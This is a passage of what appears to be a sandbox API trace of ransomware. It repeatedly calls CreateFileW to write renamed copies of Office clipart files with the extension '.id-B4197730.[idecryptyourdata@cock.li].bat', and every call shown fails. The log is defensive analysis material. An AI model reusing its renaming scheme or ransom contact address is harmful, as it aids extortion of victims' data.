CloseHandle (hObject=0x50c) returned 1 [0173.985] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.986] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.986] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00911_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00911_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.986] CloseHandle (hObject=0x50c) returned 1 [0173.987] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.987] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.988] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00913_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00913_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.988] CloseHandle (hObject=0x50c) returned 1 [0173.989] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.989] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.989] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00914_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00914_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.989] CloseHandle (hObject=0x50c) returned 1 [0173.991] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.991] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.991] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00915_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00915_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.991] CloseHandle (hObject=0x50c) returned 1 [0173.993] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.993] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.993] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00916_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00916_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.994] CloseHandle (hObject=0x50c) returned 1 [0173.994] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.994] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.994] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00917_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00917_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.995] CloseHandle (hObject=0x50c) returned 1 [0173.996] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.996] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.996] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00918_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00918_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.997] CloseHandle (hObject=0x50c) returned 1 [0173.997] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.997] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.998] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00935_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00935_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.001] CloseHandle (hObject=0x50c) returned 1 [0174.003] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.003] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.003] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00938_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00938_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.003] CloseHandle (hObject=0x50c) returned 1 [0174.240] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.240] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.240] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02439_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02439_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.241] CloseHandle (hObject=0x37c) returned 1 [0174.242] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.242] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.242] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02464_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02464_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.244] CloseHandle (hObject=0x37c) returned 1 [0174.244] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.245] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.245] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02465_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02465_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.245] CloseHandle (hObject=0x37c) returned 1 [0174.246] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.246] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.246] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02578_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02578_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.246] CloseHandle (hObject=0x37c) returned 1 [0174.247] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.247] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.247] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02617_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02617_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.247] CloseHandle (hObject=0x37c) returned 1 [0174.248] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.248] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.248] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02790_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02790_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.249] CloseHandle (hObject=0x37c) returned 1 [0174.250] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.250] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.250] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02791_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02791_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.250] CloseHandle (hObject=0x37c) returned 1 [0174.252] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.252] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.252] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02793_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02793_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.252] CloseHandle (hObject=0x37c) returned 1 [0174.255] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.255] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.256] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02794_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02794_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.256] CloseHandle (hObject=0x37c) returned 1 [0174.257] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.257] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.257] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02862_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02862_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.257] CloseHandle (hObject=0x37c) returned 1 [0174.258] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.258] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.258] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02886_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02886_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.259] CloseHandle (hObject=0x37c) returned 1 [0174.259] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.259] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.260] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02958_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02958_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.260] CloseHandle (hObject=0x37c) returned 1 [0174.261] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.261] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.261] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\STUBBY1.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\stubby1.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.261] CloseHandle (hObject=0x37c) returned 1 [0174.262] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.262] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.262] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\STUBBY2.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\stubby2.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.263] CloseHandle (hObject=0x37c) returned 1 [0174.264] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.264] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.264] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00110_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00110_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.264] CloseHandle (hObject=0x37c) returned 1 [0174.265] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.265] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.265] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00127_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00127_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.265] CloseHandle (hObject=0x37c) returned 1 [0174.267] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.267] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.267] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00132_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00132_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.267] CloseHandle (hObject=0x37c) returned 1 [0174.268] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.268] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.268] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00170_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00170_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.269] CloseHandle (hObject=0x37c) returned 1 [0174.270] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.270] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.270] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00560_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00560_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.271] CloseHandle (hObject=0x37c) returned 1 [0174.273] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.273] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.273] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00642_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00642_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.274] CloseHandle (hObject=0x37c) returned 1 [0174.275] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.275] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.275] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00788_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00788_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.276] CloseHandle (hObject=0x37c) returned 1 [0174.278] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.278] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.278] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00792_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00792_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.696] CloseHandle (hObject=0x37c) returned 1 [0174.697] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.697] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0174.697] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01238_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01238_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, 